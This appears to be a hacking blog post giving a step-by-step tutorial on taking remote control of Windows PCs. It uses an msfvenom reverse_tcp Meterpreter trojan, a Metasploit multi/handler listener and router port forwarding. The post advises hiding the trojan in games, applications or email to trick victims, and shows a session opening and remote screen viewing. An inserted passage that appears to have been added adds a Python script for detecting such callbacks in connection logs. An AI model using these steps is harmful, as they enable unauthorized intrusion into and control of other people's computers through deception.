
How to hack Windows 10 using Kali Linux remotely with Metasploit – 2018

Microsoft claims that Windows 10 has fixed all security vulnerabilities. We can't hack a Windows PC with a remote exploit like "ms08_067_netapi" anymore; Windows has patched that vulnerability. So sad. But wait a minute: how can we hack a Windows PC then, is that even possible now? The answer is yes. Windows machines are still vulnerable to Trojan attacks regardless of version. With this method you can hack any Windows machine: 10, 8.1, 8, 7, Vista and XP.

A Trojan or a backdoor can give remote access to the target machine. We all know that, so I'm not going too deep into explaining what a Trojan is. Here we are going to use a reverse_tcp Trojan. This is a specially crafted piece of malware that establishes a connection from the victim machine back to the hacker's machine over the Transmission Control Protocol (TCP). This allows the hacker to breach the machine and take full control over it.

The Metasploit framework is one of the tools I love most in Kali Linux. It has both a handler and a payload generator. Once the payload is executed on the target machine while we are listening in the handler, it spawns a Meterpreter shell. This Meterpreter shell allows us to communicate with the target system and execute shell commands. Compared to a normal shell, Meterpreter has plenty of extra options. This works whether the target is on the same LAN or across the internet; the only difference is that you have to configure the router and the payload accordingly. The process is dead simple. Follow the steps.


Router Configuration

This step matters only when your target is over the internet (WAN). Skip it if your target is on the same LAN. Hacking a PC over the internet means traffic has to flow in both directions, so your router/modem must expose a port of your machine to the outside. This is called port forwarding; by default your router/modem keeps all inbound ports closed. Open a browser and go to http://192.168.1.1, then type in your username and password (by default both are "admin"). This takes you to the router settings. Go to Advanced settings and find Port forwarding. Click Add new and set both the start and end port to 444 (since we are using port 444 in Metasploit). In the IP address field, type your Linux machine's internal IP. Save the settings and you are done. You can double-check by scanning your port with an online port scanner.


Generate the Trojan

Generate the payload using msfvenom. Set the port to 444 and the IP to your public IP or your local IP, depending on where your target is. The generated Trojan will try to connect to this IP and port when it is executed. The following command generates the Trojan in .exe format.
MOST COMMON ERROR: validating LHOST on creation; see this thread – create-windows-meterpreter-payload-that-resolve-execution
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST="attacker ip" LPORT=444 -o /root/Desktop/trojan.exe

The Trojan will be generated on the Desktop. Keep it aside and move on to the handler section. Fire up Metasploit and follow the steps.
# msfconsole

Wait for a minute and msfconsole will come up. Select the handler, then set the payload, port and host.

1. Handler

msf> use multi/handler

2. Set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST "attacker ip"

5. Exploit

msf exploit(handler) > exploit

Wait for the target to connect back:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…


Execute the payload

Now you have to execute your Trojan on the target system. Distributing the raw exe file is a bad idea; better to encode it and attach it to a normal application, a game, or even an email. Once our Trojan is in and executed, a Meterpreter session will be spawned:
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter >
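From the defender's side, the handler output above is exactly what a network sensor sees in reverse: a workstation opens an outbound TCP connection to an unusual port, sends almost nothing, and immediately receives a large blob (the 83170-byte stage) before the session goes quiet for a long time. The following script is an added example, not part of the original post or of Metasploit, that runs that heuristic over a few constructed connection records in a Zeek-style conn.log layout. The port allow-list and byte thresholds are assumptions to tune for your own environment.

```python
"""Spot outbound TCP connections that look like a staged reverse_tcp callback.

Added example (not from the original post). The heuristic is an assumption:
a staged reverse shell connects out, the client sends almost nothing, and the
listener immediately pushes a large second stage (83170 bytes in the handler
output above) over a port that ordinary workstation traffic does not use.
"""
from dataclasses import dataclass

# Constructed sample in a Zeek-style conn.log layout (tab separated, no header):
# ts  orig_h  orig_p  resp_h  resp_p  proto  duration  orig_bytes  resp_bytes
# Record 2 mirrors the session in the post (192.168.1.105 -> 192.168.1.104:444).
SAMPLE_CONN_LOG = """\
1463732440.1\t192.168.1.105\t49731\t93.184.216.34\t443\ttcp\t2.1\t1840\t41200
1463732445.0\t192.168.1.105\t36028\t192.168.1.104\t444\ttcp\t912.4\t212\t83170
1463732450.3\t192.168.1.105\t49740\t192.168.1.1\t53\tudp\t0.0\t60\t120
1463732460.7\t192.168.1.105\t49742\t198.51.100.7\t8080\ttcp\t0.4\t500\t600
"""

# Ports a workstation is expected to talk to; tune per environment (assumption).
COMMON_OUTBOUND_PORTS = {22, 25, 53, 80, 443, 587, 993, 995}
MIN_STAGE_BYTES = 50_000   # a Meterpreter second stage is tens of KB (assumption)
MAX_CLIENT_BYTES = 2_000   # the stager itself barely sends anything (assumption)


@dataclass
class Conn:
    ts: float
    orig_h: str
    orig_p: int
    resp_h: str
    resp_p: int
    proto: str
    duration: float
    orig_bytes: int
    resp_bytes: int


def parse_conn_log(text):
    """Parse tab-separated connection records; comments and malformed lines are skipped."""
    conns = []
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        fields = line.strip().split("\t")
        if len(fields) != 9:
            continue
        conns.append(Conn(float(fields[0]), fields[1], int(fields[2]), fields[3],
                          int(fields[4]), fields[5], float(fields[6]),
                          int(fields[7]), int(fields[8])))
    return conns


def classify(c):
    """Return (uncommon_port, stage_push): the two signals of a staged callback.

    uncommon_port: TCP to a port outside the allow-list.
    stage_push:    the responder sent a large blob while the client stayed silent,
                   which is the shape of a stager downloading its second stage.
    """
    is_tcp = c.proto == "tcp"
    uncommon_port = is_tcp and c.resp_p not in COMMON_OUTBOUND_PORTS
    stage_push = (is_tcp and c.resp_bytes >= MIN_STAGE_BYTES
                  and c.orig_bytes <= MAX_CLIENT_BYTES)
    return uncommon_port, stage_push


def find_staged_callbacks(text):
    """Return the connections that show both signals at once."""
    return [c for c in parse_conn_log(text) if all(classify(c))]


if __name__ == "__main__":
    for c in find_staged_callbacks(SAMPLE_CONN_LOG):
        print(f"suspect callback: {c.orig_h}:{c.orig_p} -> {c.resp_h}:{c.resp_p} "
              f"({c.resp_bytes} bytes received, {c.orig_bytes} sent, open {c.duration:.0f}s)")
```

Requiring both signals keeps the noise down: the HTTPS download on 443 receives a lot of data but on an expected port, and the short 8080 connection hits an odd port but never receives a stage. A long-lived, nearly idle session after the initial push (912 seconds here) is the beaconing that egress filtering on the firewall, as opposed to the port forwarding described above, is meant to block in the first place.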
A Meterpreter session allows you to execute system commands, run networking commands, watch the screen and much more.

Use the help command to see the whole list of commands:

meterpreter > help

Use this command to run a VNC session and watch the target's screen:

meterpreter > run vnc
This whole process is simple, but the toughest part is getting the Trojan onto the target user's machine. Attaching the file to a game works great.
Read my blog post on privilege escalation in Windows to learn how to get admin privileges on a hacked system.

Any doubts or questions? Ask them on our new hackers' Q and A forum, askthehackers.com.



susmith HCK Author

I'm a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and the latest tech news and share them with you. If you like all this stuff, add me on Facebook and Google Plus.